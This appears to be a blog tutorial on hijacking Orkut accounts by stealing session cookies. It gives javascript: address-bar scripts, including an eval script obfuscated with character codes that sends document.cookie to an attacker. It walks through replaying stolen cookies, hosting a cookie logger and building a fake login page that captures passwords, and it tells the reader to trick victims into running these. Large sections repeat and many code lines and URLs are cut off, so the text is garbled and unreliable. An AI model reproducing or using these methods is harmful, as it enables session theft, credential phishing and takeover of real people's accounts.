Orkut Cookie Stealer Method (Hack Orkut ID's)
1]what are cookies?
A:-Cookies are text messages/files given to a web browser by web servers. The main purpose of a cookie is to identify users and possibly prepare customized webpage or to save site logins information for you. When you enter a web site using cookies, you may be asked to fill out a form providing such information as your name;
email address etc. This information is packaged into a cookie and sent to your web browser, which store it for your later use.The next time you go to the same web site,your browser will send the cookie to the web server.This message is then sent back to the server each time the browser requests the page from the server.
A web server has no memory so the hosted website you are visiting transfers a cookie file of the browser stores on your computers hard disk so that the web site can remember who you are and your preferences.This message exchange allows the web servers to use this information to present you with customized Web pages
Types of Cookies:
[a]session cookie:
Its also called a transient cookie.Its a cookie that is erased when you close the Web browser.The sessional cookies are stored in temporary memory and are not retained after the browser is closed. cookies do not collect the information on your computers. They typically will store information in the forms of the session identification that does not personally identify the user.
[b]persistent cookie:
Its also called a permanent cookie or cookie, a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates)or until you delete a cookie.Persistent cookies are used to collect the information for identifying information about the user,such as Websurfing behaviors/preferences for the specific Web site.
Orkut cookie stealing script
Requirements:-
1]Firefox
2]Add and edit cookie addon[cookie editor]:- https://addons.mozilla.org/firefox/addo
Instructions:
1]First of all make a fake account for better understanding .Now we will hack the fake profile from the real profile.
2]You will need GID of fake profile/victim profile so use the following cookie stealing script.
3]In order to get the GID,Go to your fake account/victims homepage and paste this script in the address bar and hit enter You will see the gid in the box.
Code:
javascript:sri=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);sri=parseInt(sri);alert(sri);void(0)
Other ways to find GID:Method 2
->Go to any profile
->Right click and select view page source
->Now press Ctrl+F[Find] and type in it "background-image"
->It will point out to this line which resembles the below line
A:-Cookies are text messages/files given to a web browser by web servers. The main purpose of a cookie is to identify users and possibly prepare customized webpage or to save site logins information for you. When you enter a web site using cookies, you may be asked to fill out a form providing such information as your name;
email address etc. This information is packaged into a cookie and sent to your web browser, which store it for your later use.The next time you go to the same web site,your browser will send the cookie to the web server.This message is then sent back to the server each time the browser requests the page from the server.
A web server has no memory so the hosted website you are visiting transfers a cookie file of the browser stores on your computers hard disk so that the web site can remember who you are and your preferences.This message exchange allows the web servers to use this information to present you with customized Web pages
Types of Cookies:
[a]session cookie:
Its also called a transient cookie.Its a cookie that is erased when you close the Web browser.The sessional cookies are stored in temporary memory and are not retained after the browser is closed. cookies do not collect the information on your computers. They typically will store information in the forms of the session identification that does not personally identify the user.
[b]persistent cookie:
Its also called a permanent cookie or cookie, a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates)or until you delete a cookie.Persistent cookies are used to collect the information for identifying information about the user,such as Websurfing behaviors/preferences for the specific Web site.
Orkut cookie stealing script
Requirements:-
1]Firefox
2]Add and edit cookie addon[cookie editor]:- https://addons.mozilla.org/firefox/addo
Instructions:
1]First of all make a fake account for better understanding .Now we will hack the fake profile from the real profile.
2]You will need GID of fake profile/victim profile so use the following cookie stealing script.
3]In order to get the GID,Go to your fake account/victims homepage and paste this script in the address bar and hit enter You will see the gid in the box.
Code:
javascript:sri=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);sri=parseInt(sri);alert(sri);void(0)
Other ways to find GID:Method 2
->Go to any profile
->Right click and select view page source
->Now press Ctrl+F[Find] and type in it "background-image"
->It will point out to this line which resembles the below line
background-image: url(http://img3.orkut.com/images/medium
The red part is your Gid
Method 3
Go to victims home page/ fake profile and then right click on display picture and choose copy image location.You will then get the a URL given below which exactly resembles the one you got
http://img3.orkut.com/images/medium/123
The red part is your Gid
Now suppose your GID is 2541021 then your cookie stealing script will be like this
Code:java script:orkut=replyForm;orkut.toUserId.va
100,D
111,O
9 9, C
117,U
109,M
101,E
110,N
116,T
4 6, .
9 9, C
111,O
111,O
107,K
105,I
101,E
Still remember the example from my above post, this is how you read the content of a cookie: vartheCookie=""+document.cookie;
eval() is a function, which will execute represented by the string,which is in this case masked behind the numbers.
Quite clever, but the first time I have seen tricks like this. I can already imagine how the orkut solved the first problem previously.They just forbid the string "document.cookie" in users code which solved the problem at first,but obviously that doesn't solve this issue.
So again, this is not a bug within Firefox, that it is a normal Javascript code and Firefox executes it just as the way it is expected to be executed.
If there is a security bug somewhere in ., it is either in the specifications of the Javascript or at the orkut website.
Ok now
Scrap this to victim and tell him/her to run it in the address bar, as soon as he/she runs the script you will get a cookie info into your fake account.
Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.The victim's cookie which will come to your Scrapbook will look like this.
__utmz=85cn=(direct)|utmcsr=(direct)|utm
Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit
Go to Tools-->Cookies Editor ---> select Add
http://www.orkut.co.in/AlbumZoom.aspx?u
Fill Name : orkut_state
Contents : Fill in the cookies here
Host : .www.orkut.co.in
Then click savePaste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.You can notice that you have logged in victims id after you click on refresh.
Other ways to obtain cookies:
1]Using Cookie Monster
You can also use a cookie monster and make the ultimate cookie exploit to hack OrkutLets start and Make the ultimate cookie exploit to hack Orkut
1.Go to Lenhost.info . Make a free Hosting account .
2.It will mail you all the details as ftp / My Sql username and password
3. Download Install.php from here
http://rapidshare.com/files/53318259/in
4. Upload this file on the server and run .
5 . It will Open as : a Installer
6. Fill the Coloums :
Database : its something like username_name
For this go to mysql and make a database there .
Password : Your Password
User : sent to u by mail
Table : Give any name in this column
Server : This is found in mysql
Admin Password : Provide a pass to access admin area
Once you are done select Submit .
7. Next page in the end show u some links get the 4th link
8.javascript:document.location='http://
Replace My link wid urs in the above javascript.
9. Done send it to your victim when victim runs this his cookies gets stolen
10. Receiving cookies open admin area http://name.lenhost.info/logmonster.php it asks for the pass login with the pass you provided during installation.
2]Using Cookie Stealer In Fake Page
Use This Run.php File In Fake Page
http://www.freeuploading.com/files/_5JD
And The Cookie And Login Details Will BE Saved In ld.txt
Copy the whole source code of the Login Page Of Orkut.Paste In Notepad
Search for "https://www.google.com/accounts/Servic
And Change Method From File to get the Login details
Now Upload This two files to x10hosting server as its best
and send the link to victim
His Cookie And Login Details Will Saved In
http://ur-username.x10hosting.com/ld.tx
means in ld.txt
Upload google_transperant.gif also which u can save from login page ///
For Fake login pages Download This
http://www.freeuploading.com/files/Bgtn
Now Just Upload This 3 files in your account of x10hosting
Now Send This type of link to victim
http://example.x10hosting.com/orkut.htm
ok when he will do login in this page u will get the details means cookie and login detail (username and password)
in this file
http://example.x10hosting.com/ld.txt
Enjoy !!!
Note:You can only login into others accounts using the cookies.You can't change the password/perform transfer of ownership of communities on orkut because they require old password to do so.
For more information plz refer to the following topics in the community
The red part is your Gid
Method 3
Go to victims home page/ fake profile and then right click on display picture and choose copy image location.You will then get the a URL given below which exactly resembles the one you got
http://img3.orkut.com/images/medium/123
The red part is your Gid
Now suppose your GID is 2541021 then your cookie stealing script will be like this
Code:java script:orkut=replyForm;orkut.toUserId.va
100,D
111,O
9 9, C
117,U
109,M
101,E
110,N
116,T
4 6, .
9 9, C
111,O
111,O
107,K
105,I
101,E
Still remember the example from my above post, this is how you read the content of a cookie: vartheCookie=""+document.cookie;
eval() is a function, which will execute represented by the string,which is in this case masked behind the numbers.
Quite clever, but the first time I have seen tricks like this. I can already imagine how the orkut solved the first problem previously.They just forbid the string "document.cookie" in users code which solved the problem at first,but obviously that doesn't solve this issue.
So again, this is not a bug within Firefox, that it is a normal Javascript code and Firefox executes it just as the way it is expected to be executed.
If there is a security bug somewhere in ., it is either in the specifications of the Javascript or at the orkut website.
Ok now
Scrap this to victim and tell him/her to run it in the address bar, as soon as he/she runs the script you will get a cookie info into your fake account.
Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.The victim's cookie which will come to your Scrapbook will look like this.
__utmz=85cn=(direct)|utmcsr=(direct)|utm
Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit
Go to Tools-->Cookies Editor ---> select Add
http://www.orkut.co.in/AlbumZoom.aspx?u
Fill Name : orkut_state
Contents : Fill in the cookies here
Host : .www.orkut.co.in
Then click savePaste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.You can notice that you have logged in victims id after you click on refresh.
Other ways to obtain cookies:
1]Using Cookie Monster
You can also use a cookie monster and make the ultimate cookie exploit to hack OrkutLets start and Make the ultimate cookie exploit to hack Orkut
1.Go to Lenhost.info . Make a free Hosting account .
2.It will mail you all the details as ftp / My Sql username and password
3. Download Install.php from here
http://rapidshare.com/files/53318259/in
4. Upload this file on the server and run .
5 . It will Open as : a Installer
6. Fill the Coloums :
Database : its something like username_name
For this go to mysql and make a database there .
Password : Your Password
User : sent to u by mail
Table : Give any name in this column
Server : This is found in mysql
Admin Password : Provide a pass to access admin area
Once you are done select Submit .
7. Next page in the end show u some links get the 4th link
8.javascript:document.location='http://
Replace My link wid urs in the above javascript.
9. Done send it to your victim when victim runs this his cookies gets stolen
10. Receiving cookies open admin area http://name.lenhost.info/logmonster.php it asks for the pass login with the pass you provided during installation.
2]Using Cookie Stealer In Fake Page
Use This Run.php File In Fake Page
http://www.freeuploading.com/files/_5JD
And The Cookie And Login Details Will BE Saved In ld.txt
Copy the whole source code of the Login Page Of Orkut.Paste In Notepad
Search for "https://www.google.com/accounts/Servic
And Change Method From File to get the Login details
Now Upload This two files to x10hosting server as its best
and send the link to victim
His Cookie And Login Details Will Saved In
http://ur-username.x10hosting.com/ld.tx
means in ld.txt
Upload google_transperant.gif also which u can save from login page ///
For Fake login pages Download This
http://www.freeuploading.com/files/Bgtn
Now Just Upload This 3 files in your account of x10hosting
Now Send This type of link to victim
http://example.x10hosting.com/orkut.htm
ok when he will do login in this page u will get the details means cookie and login detail (username and password)
in this file
http://example.x10hosting.com/ld.txt
Enjoy !!!
Note:You can only login into others accounts using the cookies.You can't change the password/perform transfer of ownership of communities on orkut because they require old password to do so.
For more information plz refer to the following topics in the community
0 comments:
Post a Comment